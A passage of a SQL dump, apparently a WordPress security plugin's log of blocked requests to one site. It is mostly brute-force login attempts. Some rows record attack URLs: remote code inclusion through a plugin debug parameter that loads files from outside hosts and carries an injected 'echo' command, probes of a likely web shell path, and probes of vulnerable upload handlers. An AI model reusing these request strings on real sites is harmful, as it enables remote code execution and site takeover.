14:33:06','23.239.97.106','http://www.smithandsmith.co.za//wp-login.php','404shield',''),(869,'2019-04-03 14:54:22','192.200.112.194','http://www.smithandsmith.co.za//wp-login.php','404shield',''),(870,'2019-04-03 14:54:22','192.200.112.194','http://www.smithandsmith.co.za//wp-login.php','404shield',''),(871,'2019-04-03 14:54:23','23.239.118.202','http://www.smithandsmith.co.za//wp-login.php','404shield',''),(872,'2019-04-03 14:54:24','23.239.118.202','http://www.smithandsmith.co.za//wp-login.php','404shield',''),(873,'2019-04-03 19:26:16','128.1.34.12','http://www.smithandsmith.co.za//wp-login.php','404shield',''),(874,'2019-04-03 19:26:17','128.1.34.12','http://www.smithandsmith.co.za//wp-login.php','404shield',''),(875,'2019-04-03 20:22:53','192.154.105.2','http://www.smithandsmith.co.za//wp-login.php','404shield',''),(876,'2019-04-03 20:22:54','192.154.105.2','http://www.smithandsmith.co.za//wp-login.php','404shield',''),(877,'2019-04-03 20:22:58','192.154.106.10','http://www.smithandsmith.co.za//wp-login.php','404shield',''),(878,'2019-04-03 20:22:58','192.154.106.10','http://www.smithandsmith.co.za//wp-login.php','404shield',''),(879,'2019-04-03 20:23:00','23.239.97.106','http://www.smithandsmith.co.za//wp-login.php','404shield',''),(880,'2019-04-03 20:23:00','23.239.97.106','http://www.smithandsmith.co.za//wp-login.php','404shield',''),(881,'2019-04-03 20:23:04','192.154.101.50','http://www.smithandsmith.co.za//wp-login.php','404shield',''),(882,'2019-04-03 20:23:04','192.154.101.50','http://www.smithandsmith.co.za//wp-login.php','404shield',''),(883,'2019-04-03 20:23:05','192.154.106.18','http://www.smithandsmith.co.za//wp-login.php','404shield',''),(884,'2019-04-03 20:23:05','192.154.106.18','http://www.smithandsmith.co.za//wp-login.php','404shield',''),(885,'2019-04-03 20:23:10','104.250.153.250','http://www.smithandsmith.co.za//wp-login.php','404shield',''),(886,'2019-04-03 20:23:11','104.250.153.250','http://www.smithandsmith.co.za//wp-login.php','404shield',''),(887,'2019-04-03 20:23:35','192.154.105.154','http://www.smithandsmith.co.za//wp-login.php','404shield',''),(888,'2019-04-03 20:23:35','192.154.105.154','http://www.smithandsmith.co.za//wp-login.php','404shield',''),(889,'2019-04-03 20:56:40','23.239.118.202','http://www.smithandsmith.co.za//wp-login.php','404shield',''),(890,'2019-04-03 20:56:42','23.239.118.202','http://www.smithandsmith.co.za//wp-login.php','404shield',''),(891,'2019-04-03 20:56:59','192.200.112.194','http://www.smithandsmith.co.za//wp-login.php','404shield',''),(892,'2019-04-03 20:56:59','192.200.112.194','http://www.smithandsmith.co.za//wp-login.php','404shield',''),(893,'2019-04-04 06:56:08','192.154.108.146','http://www.smithandsmith.co.za//wp-login.php','404shield',''),(894,'2019-04-04 06:56:09','192.154.108.146','http://www.smithandsmith.co.za//wp-login.php','404shield',''),(895,'2019-04-04 07:03:27','128.1.34.12','http://www.smithandsmith.co.za//wp-login.php','404shield',''),(896,'2019-04-04 07:03:28','128.1.34.12','http://www.smithandsmith.co.za//wp-login.php','404shield',''),(897,'2019-04-04 07:05:35','192.154.106.18','http://www.smithandsmith.co.za//wp-login.php','404shield',''),(898,'2019-04-04 07:05:35','23.239.97.106','http://www.smithandsmith.co.za//wp-login.php','404shield',''),(899,'2019-04-04 07:05:36','23.239.97.106','http://www.smithandsmith.co.za//wp-login.php','404shield',''),(900,'2019-04-04 07:05:36','192.154.106.18','http://www.smithandsmith.co.za//wp-login.php','404shield',''),(901,'2019-04-04 07:07:34','104.250.153.250','http://www.smithandsmith.co.za//wp-login.php','404shield',''),(902,'2019-04-04 07:07:34','192.154.106.10','http://www.smithandsmith.co.za//wp-login.php','404shield',''),(903,'2019-04-04 07:07:34','104.250.153.250','http://www.smithandsmith.co.za//wp-login.php','404shield',''),(904,'2019-04-04 07:07:35','192.154.106.10','http://www.smithandsmith.co.za//wp-login.php','404shield',''),(905,'2019-04-04 07:07:38','192.154.101.50','http://www.smithandsmith.co.za//wp-login.php','404shield',''),(906,'2019-04-04 07:07:38','192.154.101.50','http://www.smithandsmith.co.za//wp-login.php','404shield',''),(907,'2019-04-04 07:07:55','192.154.105.2','http://www.smithandsmith.co.za//wp-login.php','404shield',''),(908,'2019-04-04 07:07:55','192.154.105.2','http://www.smithandsmith.co.za//wp-login.php','404shield',''),(909,'2019-04-04 07:08:12','192.154.105.154','http://www.smithandsmith.co.za//wp-login.php','404shield',''),(910,'2019-04-04 07:08:13','192.154.105.154','http://www.smithandsmith.co.za//wp-login.php','404shield',''),(911,'2019-04-04 07:15:30','23.239.118.202','http://www.smithandsmith.co.za//wp-login.php','404shield',''),(912,'2019-04-04 07:15:31','23.239.118.202','http://www.smithandsmith.co.za//wp-login.php','404shield',''),(913,'2019-04-04 07:28:11','192.200.112.194','http://www.smithandsmith.co.za//wp-login.php','404shield',''),(914,'2019-04-04 07:28:11','192.200.112.194','http://www.smithandsmith.co.za//wp-login.php','404shield',''),(915,'2019-04-04 08:33:43','192.99.4.37','http://smithandsmith.co.za//wp-admin/wp.php?act=ul','404shield',''),(916,'2019-04-04 09:50:54','169.1.68.8','http://smithandsmith.co.za/wp-login.php','404shield',''),(917,'2019-04-04 12:18:16','192.154.108.146','http://www.smithandsmith.co.za//wp-login.php','404shield',''),(918,'2019-04-04 12:18:17','192.154.108.146','http://www.smithandsmith.co.za//wp-login.php','404shield',''),(919,'2019-04-04 12:49:57','23.239.97.106','http://www.smithandsmith.co.za//wp-login.php','404shield',''),(920,'2019-04-04 12:49:57','192.154.101.50','http://www.smithandsmith.co.za//wp-login.php','404shield',''),(921,'2019-04-04 12:49:57','192.154.106.18','http://www.smithandsmith.co.za//wp-login.php','404shield',''),(922,'2019-04-04 12:49:58','23.239.97.106','http://www.smithandsmith.co.za//wp-login.php','404shield',''),(923,'2019-04-04 12:49:58','192.154.106.18','http://www.smithandsmith.co.za//wp-login.php','404shield',''),(924,'2019-04-04 12:49:58','192.154.101.50','http://www.smithandsmith.co.za//wp-login.php','404shield',''),(925,'2019-04-04 12:49:58','192.154.105.2','http://www.smithandsmith.co.za//wp-login.php','404shield',''),(926,'2019-04-04 12:49:59','192.154.105.2','http://www.smithandsmith.co.za//wp-login.php','404shield',''),(927,'2019-04-04 12:50:01','192.154.106.10','http://www.smithandsmith.co.za//wp-login.php','404shield',''),(928,'2019-04-04 12:50:02','192.154.106.10','http://www.smithandsmith.co.za//wp-login.php','404shield',''),(929,'2019-04-04 12:50:13','192.154.105.154','http://www.smithandsmith.co.za//wp-login.php','404shield',''),(930,'2019-04-04 12:50:13','192.154.105.154','http://www.smithandsmith.co.za//wp-login.php','404shield',''),(931,'2019-04-04 12:50:26','104.250.153.250','http://www.smithandsmith.co.za//wp-login.php','404shield',''),(932,'2019-04-04 12:50:26','104.250.153.250','http://www.smithandsmith.co.za//wp-login.php','404shield',''),(933,'2019-04-04 13:10:15','23.239.118.202','http://www.smithandsmith.co.za//wp-login.php','404shield',''),(934,'2019-04-04 13:10:16','23.239.118.202','http://www.smithandsmith.co.za//wp-login.php','404shield',''),(935,'2019-04-04 13:26:53','192.200.112.194','http://www.smithandsmith.co.za//wp-login.php','404shield',''),(936,'2019-04-04 13:26:55','192.200.112.194','http://www.smithandsmith.co.za//wp-login.php','404shield',''),(937,'2019-04-04 14:20:25','128.1.34.12','http://www.smithandsmith.co.za//wp-login.php','404shield',''),(938,'2019-04-04 14:20:26','128.1.34.12','http://www.smithandsmith.co.za//wp-login.php','404shield',''),(939,'2019-04-04 15:10:52','128.1.34.12','http://www.smithandsmith.co.za/wp-login.php','404shield',''),(940,'2019-04-04 15:10:53','128.1.34.12','http://www.smithandsmith.co.za/wp-login.php','404shield',''),(941,'2019-04-04 21:43:58','128.1.34.12','http://www.smithandsmith.co.za/wp-login.php','404shield',''),(942,'2019-04-04 21:44:00','128.1.34.12','http://www.smithandsmith.co.za/wp-login.php','404shield',''),(943,'2019-04-04 21:57:39','128.1.34.12','http://www.smithandsmith.co.za/wp-login.php','404shield',''),(944,'2019-04-04 21:57:40','128.1.34.12','http://www.smithandsmith.co.za/wp-login.php','404shield',''),(945,'2019-04-05 04:26:43','128.1.34.12','http://www.smithandsmith.co.za/wp-login.php','404shield',''),(946,'2019-04-05 04:26:44','128.1.34.12','http://www.smithandsmith.co.za/wp-login.php','404shield',''),(947,'2019-04-05 11:13:18','128.1.34.12','http://www.smithandsmith.co.za/wp-login.php','404shield',''),(948,'2019-04-05 11:13:20','128.1.34.12','http://www.smithandsmith.co.za/wp-login.php','404shield',''),(949,'2019-04-05 15:01:19','128.1.34.12','http://www.smithandsmith.co.za/wp-login.php','404shield',''),(950,'2019-04-05 15:01:23','128.1.34.12','http://www.smithandsmith.co.za/wp-login.php','404shield',''),(951,'2019-04-05 18:50:52','128.1.34.12','http://www.smithandsmith.co.za/wp-login.php','404shield',''),(952,'2019-04-05 18:50:54','128.1.34.12','http://www.smithandsmith.co.za/wp-login.php','404shield',''),(953,'2019-04-05 22:39:28','179.96.240.48','http://smithandsmith.co.za/wp-login.php','404shield',''),(954,'2019-04-05 23:09:58','128.1.34.12','http://www.smithandsmith.co.za/wp-login.php','404shield',''),(955,'2019-04-05 23:10:00','128.1.34.12','http://www.smithandsmith.co.za/wp-login.php','404shield',''),(956,'2019-04-06 02:55:07','128.1.34.12','http://www.smithandsmith.co.za/wp-login.php','404shield',''),(957,'2019-04-06 02:55:08','128.1.34.12','http://www.smithandsmith.co.za/wp-login.php','404shield',''),(958,'2019-04-06 02:55:10','128.1.34.12','http://www.smithandsmith.co.za/wp-login.php','404shield',''),(959,'2019-04-06 02:55:10','128.1.34.12','http://www.smithandsmith.co.za/wp-login.php','404shield',''),(960,'2019-04-06 06:43:20','77.81.16.196','http://smithandsmith.co.za/administrator/index.php','adminpw',''),(961,'2019-04-06 07:38:58','128.1.34.12','http://www.smithandsmith.co.za/wp-login.php','404shield',''),(962,'2019-04-06 07:39:01','128.1.34.12','http://www.smithandsmith.co.za/wp-login.php','404shield',''),(963,'2019-04-06 11:24:25','128.1.34.12','http://www.smithandsmith.co.za/wp-login.php','404shield',''),(964,'2019-04-06 11:24:28','128.1.34.12','http://www.smithandsmith.co.za/wp-login.php','404shield',''),(965,'2019-04-06 11:25:23','128.1.34.12','http://www.smithandsmith.co.za/wp-login.php','404shield',''),(966,'2019-04-06 16:31:39','128.1.34.12','http://www.smithandsmith.co.za/wp-login.php','404shield',''),(967,'2019-04-06 16:31:41','128.1.34.12','http://www.smithandsmith.co.za/wp-login.php','404shield',''),(968,'2019-04-06 20:04:46','128.1.34.12','http://www.smithandsmith.co.za/wp-login.php','404shield',''),(969,'2019-04-06 20:04:49','128.1.34.12','http://www.smithandsmith.co.za/wp-login.php','404shield',''),(970,'2019-04-07 01:24:44','128.1.34.12','http://www.smithandsmith.co.za/wp-login.php','404shield',''),(971,'2019-04-07 01:24:46','128.1.34.12','http://www.smithandsmith.co.za/wp-login.php','404shield',''),(972,'2019-04-07 10:10:49','197.229.0.82','http://smithandsmith.co.za/wp-login.php','404shield',''),(973,'2019-04-07 23:43:16','46.99.51.238','http://smithandsmith.co.za/wp-login.php','404shield',''),(974,'2019-04-08 08:17:07','116.203.49.247','http://smithandsmith.co.za/wp-login.php','404shield',''),(975,'2019-04-08 09:55:45','23.239.118.202','http://www.smithandsmith.co.za//wp-login.php','404shield',''),(976,'2019-04-08 09:55:47','23.239.118.202','http://www.smithandsmith.co.za//wp-login.php','404shield',''),(977,'2019-04-08 10:46:01','169.0.251.135','http://smithandsmith.co.za/wp-login.php','404shield',''),(978,'2019-04-08 10:55:24','128.1.34.12','http://www.smithandsmith.co.za/wp-login.php','404shield',''),(979,'2019-04-08 10:55:25','128.1.34.12','http://www.smithandsmith.co.za/wp-login.php','404shield',''),(980,'2019-04-08 15:53:49','23.239.118.202','http://www.smithandsmith.co.za//wp-login.php','404shield',''),(981,'2019-04-08 15:53:51','23.239.118.202','http://www.smithandsmith.co.za//wp-login.php','404shield',''),(982,'2019-04-08 17:53:12','128.1.34.12','http://www.smithandsmith.co.za/wp-login.php','404shield',''),(983,'2019-04-08 17:53:13','128.1.34.12','http://www.smithandsmith.co.za/wp-login.php','404shield',''),(984,'2019-04-09 14:10:39','78.96.82.119','http://smithandsmith.co.za/wp-login.php','404shield',''),(985,'2019-04-10 02:32:52','192.99.4.102','http://smithandsmith.co.za//wp-admin/wp.php?act=ul','404shield',''),(986,'2019-04-12 01:13:25','104.148.64.26','http://www.smithandsmith.co.za/wp-content/plugins/complete-gallery-manager/frames/upload-images.php','404shield',''),(987,'2019-04-12 06:24:55','185.153.196.157','http://smithandsmith.co.za/administrator/index.php','adminpw',''),(988,'2019-04-12 08:54:14','104.148.64.26','http://smithandsmith.co.za/wp-content/plugins/complete-gallery-manager/frames/upload-images.php','404shield',''),(989,'2019-04-13 03:56:11','186.179.163.216','http://smithandsmith.co.za/wp-login.php','404shield',''),(990,'2019-04-13 06:32:00','104.148.64.26','http://www.smithandsmith.co.za/wp-content/plugins/dzs-videogallery/admin/dzsuploader/upload.js','404shield',''),(991,'2019-04-13 14:01:52','104.148.64.26','http://smithandsmith.co.za/wp-content/plugins/dzs-videogallery/admin/dzsuploader/upload.js','404shield',''),(992,'2019-04-13 17:24:47','122.164.168.135','http://smithandsmith.co.za/wp-login.php','404shield',''),(993,'2019-04-14 01:01:03','203.76.115.90','http://www.smithandsmith.co.za//wp-admin/admin-post.php?swp_debug=load_options&swp_url=http://bearxcat.com//wp-includes/css/help.txt&wpaa=echo%20%22h1loo1%22;','404shield',''),(994,'2019-04-14 01:01:24','203.76.115.90','http://www.smithandsmith.co.za//wp-admin/admin-post.php?swp_debug=load_options&swp_url=http://www.klenzpro.com/wp-content/uploads/2017/03/sold_out.txt&wpaa=echo%20%22h1loo1%22;','404shield',''),(995,'2019-04-15 10:55:51','36.239.16.158','http://smithandsmith.co.za/wp-login.php','404shield',''),(996,'2019-04-15 12:36:03','186.236.99.118','http://smithandsmith.co.za/wp-login.php','404shield',''),(997,'2019-04-16 00:54:07','77.81.16.196','http://smithandsmith.co.za/administrator/index.php','adminpw',''),(998,'2019-04-16 09:02:30','37.97.236.116','http://smithandsmith.co.za/wp-login.php','404shield',''),(999,'2019-04-16 13:53:38','104.148.64.26','http://www.smithandsmith.co.za/wp-content/themes/purevision/style.css','404shield',''),(1000,'2019-04-16 17:17:13','179.211.64.199','http://smithandsmith.co.za/wp-login.php','404shield',''),(1001,'2019-04-16 21:17:04','104.148.64.26','http://smithandsmith.co.za/wp-content/themes/purevision/style.css','404shield',''),(1002,'2019-04-20 23:44:15','51.36.249.178','http://smithandsmith.co.za/wp-login.php','404shield',''),(1003,'2019-04-23 07:12:33','128.1.34.12','http://www.smithandsmith.co.za/wp-login.php','404shield',''),(1004,'2019-04-23 07:12:34','128.1.34.12','http://www.smithandsmith.co.za/wp-login.php','404shield',''),(1005,'2019-04-23 14:47:38','95.84.35.186','http://smithandsmith.co.za/wp-login.php','404shield',''),(1006,'2019-04-23 15:29:06','47.53.193.116','http://smithandsmith.co.za/wp-login.php','404shield',''),(1007,'2019-04-24 07:26:54','158.69.247.45','http://smithandsmith.co.za//wp-admin/wp.php?act=ul','404shield',''),(1008,'2019-04-24 07:39:15','192.185.146.8','https://smithandsmith.co.za//wp-admin/wp.php?act=ul','404shield',''),(1009,'2019-04-24 09:02:11','158.69.247.45','http://smithandsmith.co.za/wp-login.php','404shield',''),(1010,'2019-04-24 09:02:11','158.69.247.45','http://smithandsmith.co.za/wp-login.php','404shield',''),(1011,'2019-04-24 09:02:12','158.69.247.45','http://smithandsmith.co.za/wp-login.php','404shield',''),(1012,'2019-04-24 09:02:13','158.69.247.45','http://smithandsmith.co.za/wp-login.php','404shield',''),(1013,'2019-04-25 00:41:24','181.169.254.11','http://smithandsmith.co.za/wp-login.php','404shield',''),(1014,'2019-04-25 06:05:21','122.167.95.36','http://smithandsmith.co.za/wp-login.php','404shield',''),(1015,'2019-04-25 08:10:32','158.69.247.45','http://smithandsmith.co.za//wp-admin/admin-post.php?swp_debug=load_options&swp_url=http://bearxcat.com//wp-includes/css/help.txt&wpaa=echo%20%22h1loo1%22;','404shield',''),(1016,'2019-04-25 08:11:18','158.69.247.45','http://smithandsmith.co.za//wp-admin/admin-post.php?swp_debug=load_options&swp_url=http://www.klenzpro.com/wp-content/uploads/2017/03/sold_out.txt&wpaa=echo%20%22h1loo1%22;','404shield',''),(1017,'2019-04-26 10:11:15','92.53.39.108','http://smithandsmith.co.za/wp-login.php','404shield',''),(1018,'2019-04-26 10:11:19','69.12.66.245','http://smithandsmith.co.za/wp-login.php','404shield',''),(1019,'2019-04-26 10:24:47','92.222.51.75','http://smithandsmith.co.za/wp-login.php','404shield',''),(1020,'2019-04-26 12:38:33','91.160.18.231','http://smithandsmith.co.za/wp-login.php','404shield',''),(1021,'2019-04-26 18:37:11','194.61.24.252','http://smithandsmith.co.za/administrator/index.php','adminpw',''),(1022,'2019-04-27 23:14:30','89.114.157.251','http://smithandsmith.co.za/wp-login.php','404shield',''),(1023,'2019-04-29 16:07:24','177.124.140.228','http://smithandsmith.co.za/wp-login.php','404shield',''),(1024,'2019-04-30 19:54:31','37.231.249.162','http://smithandsmith.co.za/wp-login.php','404shield',''),(1025,'2019-05-02 05:26:28','93.125.99.117','http://smithandsmith.co.za/administrator/','adminpw',''),(1026,'2019-05-02 05:39:30','5.253.60.19','http://smithandsmith.co.za/administrator/index.php','adminpw',''),(1027,'2019-05-02 11:17:02','217.160.165.69','http://smithandsmith.co.za/administrator/index.php','adminpw',''),(1028,'2019-05-02 11:26:10','217.160.165.69','http://smithandsmith.co.za/administrator/index.php','adminpw',''),(1029,'2019-05-02 11:35:19','78.46.49.194','http://smithandsmith.co.za/administrator/index.php','adminpw',''),(1030,'2019-05-02 11:55:12','85.204.22.35','http://smithandsmith.co.za/administrator/index.php','adminpw',''),(1031,'2019-05-02 12:05:17','185.33.54.7','http://smithandsmith.co.za/administrator/index.php','adminpw',''),(1032,'2019-05-02 12:15:06','89.145.92.152','http://smithandsmith.co.za/administrator/index.php','adminpw',''),(1033,'2019-05-02 13:08:50','91.201.55.249','http://smithandsmith.co.za/administrator/index.php','adminpw',''),(1034,'2019-05-02 13:33:44','173.236.184.127','http://smithandsmith.co.za/administrator/index.php','adminpw',''),(1035,'2019-05-02 14:21:50','185.26.122.40','http://smithandsmith.co.za/administrator/index.php','adminpw',''),(1036,'2019-05-02 16:42:46','176.98.213.10','http://smithandsmith.co.za/wp-login.php','404shield',''),(1037,'2019-05-03 06:23:38','185.12.108.69','http://smithandsmith.co.za/administrator/index.php','adminpw',''),(1038,'2019-05-04 06:02:03','37.139.2.68','http://smithandsmith.co.za/administrator/index.php','adminpw',''),(1039,'2019-05-04 17:57:37','191.113.41.34','http://smithandsmith.co.za/wp-login.php','404shield',''),(1040,'2019-05-05 03:17:42','210.245.8.110','http://smithandsmith.co.za/administrator/index.php','adminpw',''),(1041,'2019-05-05 08:38:06','103.79.33.102','http://smithandsmith.co.za/wp-login.php','404shield',''),(1042,'2019-05-07 13:03:08','213.114.75.28','http://smithandsmith.co.za/wp-login.php','404shield',''),(1043,'2019-05-07 15:25:19','158.69.247.45','http://smithandsmith.co.za/wp-admin/plugin-install.php?tab=upload','404shield',''),(1044,'2019-05-07 15:25:24','158.69.247.45','http://smithandsmith.co.za/wp-admin/plugin-install.php?tab=upload','404shield',''),(1045,'2019-05-07 15:25:34','192.185.146.8','https://smithandsmith.co.za/wp-admin/plugin-install.php?tab=upload','404shield',''),(1046,'2019-05-07 15:25:46','192.185.146.8','https://smithandsmith.co.za/wp-admin/plugin-install.php?tab=upload','404shield',''),(1047,'2019-05-07 15:25:53','158.69.247.45','http://smithandsmith.co.za/wp-admin/plugin-install.php?tab=upload','404shield',''),(1048,'2019-05-07 15:26:08','192.185.146.8','https://smithandsmith.co.za/wp-admin/plugin-install.php?tab=upload','404shield',''),(1049,'2019-05-07 19:26:08','176.8.91.27','http://smithandsmith.co.za/wp-login.php','404shield',''),(1050,'2019-05-07 19:26:08','176.8.91.27','http://smithandsmith.co.za/wp-login.php','404shield',''),(1051,'2019-05-07 19:26:08','176.8.91.27','http://smithandsmith.co.za/wp-login.php','404shield',''),(1052,'2019-05-08 04:01:58','104.148.64.26','http://www.smithandsmith.co.za/wp-content/themes/cameleon/includes/fileuploader/upload_handler.php','404shield',''),(1053,'2019-05-08 09:42:59','192.99.0.107','http://smithandsmith.co.za/wp-admin/plugin-install.php?tab=upload','404shield',''),(1054,'2019-05-08 09:43:05','192.99.0.107','http://smithandsmith.co.za/wp-admin/plugin-install.php?tab=upload','404shield',''),(1055,'2019-05-08 09:43:11','192.185.146.8','https://smithandsmith.co.za/wp-admin/plugin-install.php?tab=upload','404shield',''),(1056,'2019-05-08 09:43:16','192.185.146.8','https://smithandsmith.co.za/wp-admin/plugin-install.php?tab=upload','404shield',''),(1057,'2019-05-08 09:43:29','192.99.0.107','http://smithandsmith.co.za/wp-admin/plugin-install.php?tab=upload','404shield',''),(1058,'2019-05-08 09:43:37','192.185.146.8','https://smithandsmith.co.za/wp-admin/plugin-install.php?tab=upload','404shield',''),(1059,'2019-05-08 11:02:36','104.148.64.26','http://smithandsmith.co.za/wp-content/themes/cameleon/includes/fileuploader/upload_handler.php','404shield',''),(1060,'2019-05-08 18:13:38','46.105.127.166','http://smithandsmith.co.za/wp-login.php','404shield',''),(1061,'2019-05-08 18:13:39','46.105.127.166','http://smithandsmith.co.za/wp-admin/plugin-install.php?tab=upload','404shield',''),(1062,'2019-05-08 18:13:41','46.105.127.166','http://smithandsmith.co.za/wp-login.php','404shield',''),(1063,'2019-05-08 18:13:46','192.185.146.8','https://smithandsmith.co.za/wp-login.php','404shield',''),(1064,'2019-05-08 18:13:46','192.185.146.8','https://smithandsmith.co.za/wp-admin/plugin-install.php?tab=upload','404shield',''),(1065,'2019-05-08 18:13:54','192.185.146.8','https://smithandsmith.co.za/wp-login.php','404shield',''),(1066,'2019-05-09 03:10:46','79.35.111.28','http://smithandsmith.co.za/wp-login.php','404shield',''),(1067,'2019-05-09 17:08:07','104.148.64.26','http://www.smithandsmith.co.za/wp-content/themes/evolve/js/back-end/libraries/fileuploader/upload_handler.php','404shield',''),(1068,'2019-05-10 00:40:08','104.148.64.26','http://smithandsmith.co.za/wp-content/themes/evolve/js/back-end/libraries/fileuploader/upload_handler.php','404shield',''),(1069,'2019-05-10 10:08:50','122.171.178.79','http://smithandsmith.co.za/wp-login.php','404shield',''),(1070,'2019-05-10 15:39:53','177.185.16.65','http://smithandsmith.co.za/wp-login.php','404shield',''),(1071,'2019-05-10 16:14:49','46.105.127.166','http://smithandsmith.co.za/wp-login.php','404shield',''),(1072,'2019-05-10 16:14:49','46.105.127.166','http://smithandsmith.co.za/wp-admin/plugin-install.php?tab=upload','404shield',''),(1073,'2019-05-10 16:14:56','46.105.127.166','http://smithandsmith.co.za/wp-login.php','404shield',''),(1074,'2019-05-10 16:15:15','192.185.146.8','https://smithandsmith.co.za/wp-admin/plugin-install.php?tab=upload','404shield',''),(1075,'2019-05-10 16:15:25','192.185.146.8','https://smithandsmith.co.za/wp-login.php','404shield',''),(1076,'2019-05-10 16:15:26','192.185.146.8','https://smithandsmith.co.za/wp-login.php','404shield',''),(1077,'2019-05-10 19:24:50','46.105.99.212','http://smithandsmith.co.za/wp-admin/plugin-install.php?tab=upload','404shield',''),(1078,'2019-05-10 19:25:01','46.105.99.212','http://smithandsmith.co.za/wp-admin/plugin-install.php?tab=upload','404shield',''),(1079,'2019-05-10 19:25:22','46.105.99.212','http://smithandsmith.co.za/wp-admin/plugin-install.php?tab=upload','404shield',''),(1080,'2019-05-11 21:53:57','89.146.153.141','http://smithandsmith.co.za/wp-login.php','404shield',''),(1081,'2019-05-12 12:09:18','104.148.64.26','http://www.smithandsmith.co.za/wp-content/uploads/levoslideshow/1_uploadfolder/big/','404shield',''),(1082,'2019-05-12 14:57:22','46.105.127.166','http://smithandsmith.co.za/wp-admin/plugin-install.php?tab=upload','404shield',''),(1083,'2019-05-12 14:57:28','46.105.127.166','http://smithandsmith.co.za/wp-login.php','404shield',''),(1084,'2019-05-12 14:57:30','46.105.127.166','http://smithandsmith.co.za/wp-login.php','404shield',''),(1085,'2019-05-12 16:32:00','218.159.65.48','http://smithandsmith.co.za/wp-login.php','404shield',''),(1086,'2019-05-12 16:32:04','153.232.166.207','http://smithandsmith.co.za/wp-login.php','404shield',''),(1087,'2019-05-12 16:32:09','153.232.166.207','http://smithandsmith.co.za/wp-login.php','404shield',''),(1088,'2019-05-12 16:32:13','153.232.166.207','http://smithandsmith.co.za/wp-admin/plugin-install.php?tab=upload','404shield',''),(1089,'2019-05-12 16:32:16','37.182.199.212','http://smithandsmith.co.za/wp-admin/plugin-install.php?tab=upload','404shield',''),(1090,'2019-05-12 16:32:18','158.69.247.45','http://smithandsmith.co.za/wp-admin/plugin-install.php?tab=upload','404shield',''),(1091,'2019-05-12 16:32:19','158.69.247.45','http://smithandsmith.co.za/wp-admin/plugin-install.php?tab=upload','404shield',''),(1092,'2019-05-12 16:34:06','190.152.5.126','http://smithandsmith.co.za/wp-login.php','404shield',''),(1093,'2019-05-12 16:34:51','158.69.247.45','http://smithandsmith.co.za/wp-admin/plugin-install.php?tab=upload','404shield',''),(1094,'2019-05-12 16:34:54','158.69.247.45','http://smithandsmith.co.za/wp-admin/plugin-install.php?tab=upload','404shield',''),(1095,'2019-05-12 17:40:49','104.148.64.26','http://smithandsmith.co.za/wp-content/uploads/levoslideshow/1_uploadfolder/big/','404shield',''),(1096,'2019-05-13 16:14:00','167.99.84.71','http://smithandsmith.co.za/wp-admin/plugin-install.php?tab=upload','404shield',''),(1097,'2019-05-13 16:14:03','142.93.96.177','http://smithandsmith.co.za/wp-login.php','404shield',''),(1098,'2019-05-13 16:14:04','142.93.96.177','http://smithandsmith.co.za/wp-admin/plugin-install.php?tab=upload','404shield',''),(1099,'2019-05-13 16:14:06','158.69.247.45','http://smithandsmith.co.za/wp-admin/plugin-install.php?tab=upload','404shield',''),(1100,'2019-05-13 16:14:09','158.69.247.45','http://smithandsmith.co.za/wp-admin/plugin-install.php?tab=upload','404shield',''),(1101,'2019-05-13 16:15:06','87.107.18.84','http://smithandsmith.co.za/wp-admin/plugin-install.php?tab=upload','404shield',''),(1102,'2019-05-13 16:15:48','158.69.247.45','http://smithandsmith.co.za/wp-admin/plugin-install.php?tab=upload','404shield',''),(1103,'2019-05-13 16:15:49','158.69.247.45','http://smithandsmith.co.za/wp-admin/plugin-install.php?tab=upload','404shield',''),(1104,'2019-05-13 17:19:33','185.87.194.24','http://smithandsmith.co.za/administrator/index.php','adminpw',''),(1105,'2019-05-14 17:12:24','120.210.219.105','http://smithandsmith.co.za/wp-admin/wp.php?act=ul','404shield',''),(1106,'2019-05-14 17:22:58','206.189.163.84','http://smithandsmith.co.za/wp-admin/wp.php?act=ul','404shield',''),(1107,'2019-05-14 21:20:37','93.254.59.197','http://smithandsmith.co.za/wp-login.php','404shield',''),(1108,'2019-05-14 21:28:59','186.10.229.54','http://smithandsmith.co.za/wp-login.php','404shield',''),(1109,'2019-05-14 21:29:01','186.10.229.54','http://smithandsmith.co.za/wp-admin/plugin-install.php?tab=upload','404shield',''),(1110,'2019-05-14 21:29:04','68.183.97.251','http://smithandsmith.co.za/wp-login.php','404shield',''),(1111,'2019-05-14 21:29:05','68.183.97.251','http://smithandsmith.co.za/wp-login.php','404shield',''),(1112,'2019-05-14 21:29:06','68.183.97.251','http://smithandsmith.co.za/wp-admin/plugin-install.php?tab=upload','404shield',''),(1113,'2019-05-14 21:29:08','104.198.165.226','http://smithandsmith.co.za/wp-admin/plugin-install.php?tab=upload','404shield',''),(1114,'2019-05-14 21:29:09','158.69.247.45','http://smithandsmith.co.za/wp-admin/plugin-install.php?tab=upload','404shield',''),(1115,'2019-05-14 21:29:10','158.69.247.45','http://smithandsmith.co.za/wp-admin/plugin-install.php?tab=upload','404shield',''),(1116,'2019-05-14 21:32:45','31.210.66.217','http://smithandsmith.co.za/wp-admin/plugin-install.php?tab=upload','404shield',''),(1117,'2019-05-14 21:32:46','157.230.149.189','http://smithandsmith.co.za/wp-admin/plugin-install.php?tab=upload','404shield',''),(1118,'2019-05-14 21:32:51','158.69.247.45','http://smithandsmith.co.za/wp-admin/plugin-install.php?tab=upload','404shield',''),(1119,'2019-05-14 21:32:52','158.69.247.45','http://smithandsmith.co.za/wp-admin/plugin-install.php?tab=upload','404shield',''),(1120,'2019-05-14 22:42:42','182.74.25.38','http://smithandsmith.co.za/wp-login.php','404shield',''),(1121,'2019-05-14 22:42:44','182.74.25.38','http://smithandsmith.co.za/wp-admin/plugin-install.php?tab=upload','404shield',''),(1122,'2019-05-14 22:42:56','190.92.40.194','http://smithandsmith.co.za/wp-login.php','404shield',''),(1123,'2019-05-14 22:42:58','198.211.101.186','http://smithandsmith.co.za/wp-admin/plugin-install.php?tab=upload','404shield',''),(1124,'2019-05-14 22:43:00','192.99.0.107','http://smithandsmith.co.za/wp-admin/plugin-install.php?tab=upload','404shield',''),(1125,'2019-05-14 22:43:01','192.99.0.107','http://smithandsmith.co.za/wp-admin/plugin-install.php?tab=upload','404shield',''),(1126,'2019-05-14 22:43:26','68.110.172.76','http://smithandsmith.co.za/wp-admin/plugin-install.php?tab=upload','404shield',''),(1127,'2019-05-14 22:44:03','192.99.0.107','http://smithandsmith.co.za/wp-admin/plugin-install.php?tab=upload','404shield',''),(1128,'2019-05-14 22:44:04','192.99.0.107','http://smithandsmith.co.za/wp-admin/plugin-install.php?tab=upload','404shield',''),(1129,'2019-05-16 